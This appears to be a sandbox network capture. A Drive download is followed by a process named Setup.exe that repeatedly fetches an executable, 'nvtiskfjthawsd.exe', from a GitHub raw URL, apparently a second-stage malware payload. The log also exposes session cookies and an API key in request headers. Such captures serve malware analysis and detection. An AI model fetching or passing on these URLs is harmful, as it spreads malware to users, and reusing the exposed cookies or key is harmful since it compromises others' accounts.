                                    https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags
                                    chrome.exe
                                    Remote address:
                                    142.250.180.10:443
                                    Request
                                    POST /$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags HTTP/2.0
                                    host: peoplestackwebexperiments-pa.clients6.google.com
                                    content-length: 39
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    x-user-agent: grpc-web-javascript/0.1
                                    x-goog-api-key: AIzaSyABqJ85_R2irnKzMtGBL0iHuyFBi6Efk1w
                                    content-type: application/json+protobuf
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://drive.google.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    POST
                                    https://peoplestackwebexperiments-pa.clients6.google.com/$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags
                                    chrome.exe
                                    Remote address:
                                    142.250.180.10:443
                                    Request
                                    POST /$rpc/peoplestackwebexperiments.PeopleStackExperimentsService/GetExperimentFlags HTTP/2.0
                                    host: peoplestackwebexperiments-pa.clients6.google.com
                                    content-length: 39
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    x-user-agent: grpc-web-javascript/0.1
                                    x-goog-api-key: AIzaSyABqJ85_R2irnKzMtGBL0iHuyFBi6Efk1w
                                    content-type: application/json+protobuf
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://drive.google.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    10.180.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    10.180.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    10.180.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s32-in-f101e100net
                                  • flag-us
                                    DNS
                                    drive.usercontent.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    drive.usercontent.google.com
                                    IN A
                                    Response
                                    drive.usercontent.google.com
                                    IN A
                                    216.58.212.193
                                  • flag-gb
                                    GET
                                    https://drive.usercontent.google.com/uc?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download
                                    chrome.exe
                                    Remote address:
                                    216.58.212.193:443
                                    Request
                                    GET /uc?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download HTTP/2.0
                                    host: drive.usercontent.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                    cookie: __Secure-ENID=25.SE=f_XTMTCXiOx_zF1SvXNQQswR7BnS8oZp53sdBmguYRoi84eNGf12SE9j6ftgobnU2ddfqMdica6SGa-UYHMCqhjg6xjs4OF--qSTBSsJZeoFP08Y_3iWhdx7e39t3lnWEbcHFJb5lMxvjyZZfG_i7QRRehBTMYq7tCZ1FlDEvIIyqSV3yTy1nt6hdIVFaMLnoWz4-vA070nBcsMA0Q
                                  • flag-gb
                                    GET
                                    https://drive.usercontent.google.com/download?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download
                                    chrome.exe
                                    Remote address:
                                    216.58.212.193:443
                                    Request
                                    GET /download?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&export=download HTTP/2.0
                                    host: drive.usercontent.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                    cookie: __Secure-ENID=25.SE=f_XTMTCXiOx_zF1SvXNQQswR7BnS8oZp53sdBmguYRoi84eNGf12SE9j6ftgobnU2ddfqMdica6SGa-UYHMCqhjg6xjs4OF--qSTBSsJZeoFP08Y_3iWhdx7e39t3lnWEbcHFJb5lMxvjyZZfG_i7QRRehBTMYq7tCZ1FlDEvIIyqSV3yTy1nt6hdIVFaMLnoWz4-vA070nBcsMA0Q
                                  • flag-us
                                    DNS
                                    193.212.58.216.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    193.212.58.216.in-addr.arpa
                                    IN PTR
                                    Response
                                    193.212.58.216.in-addr.arpa
                                    IN PTR
                                    ams16s21-in-f1931e100net
                                    193.212.58.216.in-addr.arpa
                                    IN PTR
                                    lhr25s27-in-f1�J
                                    193.212.58.216.in-addr.arpa
                                    IN PTR
                                    ams16s21-in-f1�J
                                  • flag-gb
                                    GET
                                    https://ssl.gstatic.com/docs/doclist/images/drive_2022q3_32dp.png
                                    chrome.exe
                                    Remote address:
                                    142.250.200.3:443
                                    Request
                                    GET /docs/doclist/images/drive_2022q3_32dp.png HTTP/2.0
                                    host: ssl.gstatic.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    107.27.33.23.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    107.27.33.23.in-addr.arpa
                                    IN PTR
                                    Response
                                    107.27.33.23.in-addr.arpa
                                    IN PTR
                                    a23-33-27-107deploystaticakamaitechnologiescom
                                  • flag-us
                                    DNS
                                    beacons.gcp.gvt2.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    beacons.gcp.gvt2.com
                                    IN A
                                    Response
                                    beacons.gcp.gvt2.com
                                    IN CNAME
                                    beacons-handoff.gcp.gvt2.com
                                    beacons-handoff.gcp.gvt2.com
                                    IN A
                                    74.125.206.94
                                  • flag-us
                                    DNS
                                    beacons.gcp.gvt2.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    beacons.gcp.gvt2.com
                                    IN A
                                    Response
                                    beacons.gcp.gvt2.com
                                    IN CNAME
                                    beacons-handoff.gcp.gvt2.com
                                    beacons-handoff.gcp.gvt2.com
                                    IN A
                                    74.125.206.94
                                  • flag-be
                                    POST
                                    https://beacons.gcp.gvt2.com/domainreliability/upload
                                    chrome.exe
                                    Remote address:
                                    74.125.206.94:443
                                    Request
                                    POST /domainreliability/upload HTTP/2.0
                                    host: beacons.gcp.gvt2.com
                                    content-length: 1214
                                    content-type: application/json; charset=utf-8
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-be
                                    POST
                                    https://beacons.gcp.gvt2.com/domainreliability/upload
                                    chrome.exe
                                    Remote address:
                                    74.125.206.94:443
                                    Request
                                    POST /domainreliability/upload HTTP/2.0
                                    host: beacons.gcp.gvt2.com
                                    content-length: 1526
                                    content-type: application/json; charset=utf-8
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-be
                                    POST
                                    https://beacons.gcp.gvt2.com/domainreliability/upload
                                    chrome.exe
                                    Remote address:
                                    74.125.206.94:443
                                    Request
                                    POST /domainreliability/upload HTTP/2.0
                                    host: beacons.gcp.gvt2.com
                                    content-length: 522
                                    content-type: application/json; charset=utf-8
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    94.206.125.74.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    94.206.125.74.in-addr.arpa
                                    IN PTR
                                    Response
                                    94.206.125.74.in-addr.arpa
                                    IN PTR
                                    wk-in-f941e100net
                                  • flag-gb
                                    OPTIONS
                                    https://play.google.com/log?format=json&hasfast=true&authuser=0
                                    chrome.exe
                                    Remote address:
                                    142.250.179.238:443
                                    Request
                                    OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                    host: play.google.com
                                    accept: */*
                                    access-control-request-method: POST
                                    access-control-request-headers: content-encoding,content-type,x-goog-authuser
                                    origin: https://drive.google.com
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-fetch-mode: cors
                                    sec-fetch-site: same-site
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    22.236.111.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    22.236.111.52.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    22.236.111.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    22.236.111.52.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    172.214.232.199.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    172.214.232.199.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    172.214.232.199.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    172.214.232.199.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    github.com
                                    Setup.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    github.com
                                    IN A
                                    Response
                                    github.com
                                    IN A
                                    20.26.156.215
                                  • flag-us
                                    DNS
                                    github.com
                                    Setup.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    github.com
                                    IN A
                                    Response
                                    github.com
                                    IN A
                                    20.26.156.215
                                  • flag-gb
                                    GET
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    20.26.156.215:443
                                    Request
                                    GET /arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: github.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 302 Found
                                    Server: GitHub.com
                                    Date: Sun, 12 Jan 2025 22:21:30 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    Access-Control-Allow-Origin:
                                    Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Cache-Control: no-cache
                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                    X-Frame-Options: deny
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    Referrer-Policy: no-referrer-when-downgrade
                                    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                    Content-Length: 0
                                    X-GitHub-Request-Id: DEFD:9E40B:1EA85F5:25517A5:67844069
                                  • flag-us
                                    DNS
                                    215.156.26.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    215.156.26.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    215.156.26.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    215.156.26.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    raw.githubusercontent.com
                                    Setup.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    raw.githubusercontent.com
                                    IN A
                                    Response
                                    raw.githubusercontent.com
                                    IN A
                                    185.199.111.133
                                    raw.githubusercontent.com
                                    IN A
                                    185.199.109.133
                                    raw.githubusercontent.com
                                    IN A
                                    185.199.110.133
                                    raw.githubusercontent.com
                                    IN A
                                    185.199.108.133
                                  • flag-us
                                    DNS
                                    raw.githubusercontent.com
                                    Setup.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    raw.githubusercontent.com
                                    IN A
                                  • flag-us
                                    GET
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    185.199.111.133:443
                                    Request
                                    GET /arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 1280512
                                    Cache-Control: max-age=300
                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                    Content-Type: application/octet-stream
                                    ETag: "aa32dfd7939370a3576a4217cc533f09f4cd2cc2fdc222913611038268418b02"
                                    Strict-Transport-Security: max-age=31536000
                                    X-Content-Type-Options: nosniff
                                    X-Frame-Options: deny
                                    X-XSS-Protection: 1; mode=block
                                    X-GitHub-Request-Id: DDCE:3189D4:4962BE:6291B8:6784406B
                                    Accept-Ranges: bytes
                                    Date: Sun, 12 Jan 2025 22:21:32 GMT
                                    Via: 1.1 varnish
                                    X-Served-By: cache-lcy-eglc8600046-LCY
                                    X-Cache: HIT
                                    X-Cache-Hits: 1
                                    X-Timer: S1736720493.670898,VS0,VE4
                                    Vary: Authorization,Accept-Encoding,Origin
                                    Access-Control-Allow-Origin: *
                                    Cross-Origin-Resource-Policy: cross-origin
                                    X-Fastly-Request-ID: 73ff4334c5ae103efb902e7d4fc2225f71f8c573
                                    Expires: Sun, 12 Jan 2025 22:26:32 GMT
                                    Source-Age: 0
                                  • flag-gb
                                    GET
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    20.26.156.215:443
                                    Request
                                    GET /arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: github.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 302 Found
                                    Server: GitHub.com
                                    Date: Sun, 12 Jan 2025 22:21:30 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    Access-Control-Allow-Origin:
                                    Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Cache-Control: no-cache
                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                    X-Frame-Options: deny
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    Referrer-Policy: no-referrer-when-downgrade
                                    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                    Content-Length: 0
                                    X-GitHub-Request-Id: DF1C:1564F1:1F03EB4:25B2BAB:6784406B
                                  • flag-us
                                    DNS
                                    133.111.199.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.111.199.185.in-addr.arpa
                                    IN PTR
                                    Response
                                    133.111.199.185.in-addr.arpa
                                    IN PTR
                                    cdn-185-199-111-133githubcom
                                  • flag-us
                                    DNS
                                    133.111.199.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.111.199.185.in-addr.arpa
                                    IN PTR
                                  • flag-us
                                    DNS
                                    133.111.199.185.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    133.111.199.185.in-addr.arpa
                                    IN PTR
                                  • flag-gb
                                    GET
                                    https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    20.26.156.215:443
                                    Request
                                    GET /arizaseeen/ariiiza/raw/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: github.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 302 Found
                                    Server: GitHub.com
                                    Date: Sun, 12 Jan 2025 22:21:30 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                    Access-Control-Allow-Origin:
                                    Location: https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Cache-Control: no-cache
                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                    X-Frame-Options: deny
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 0
                                    Referrer-Policy: no-referrer-when-downgrade
                                    Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                    Content-Length: 0
                                    X-GitHub-Request-Id: DF1E:9E40B:1EA8684:255185C:6784406B
                                  • flag-us
                                    GET
                                    https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe
                                    Setup.exe
                                    Remote address:
                                    185.199.111.133:443
                                    Request
                                    GET /arizaseeen/ariiiza/refs/heads/main/nvtiskfjthawsd.exe HTTP/1.1
                                    Host: raw.githubusercontent.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Connection: keep-alive
                                    Content-Length: 1280512
                                    Cache-Control: max-age=300
                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                    Content-Type: application/octet-stream
                                    ETag: "aa32dfd7939370a3576a4217cc533f09f4cd2cc2fdc222913611038268418b02"
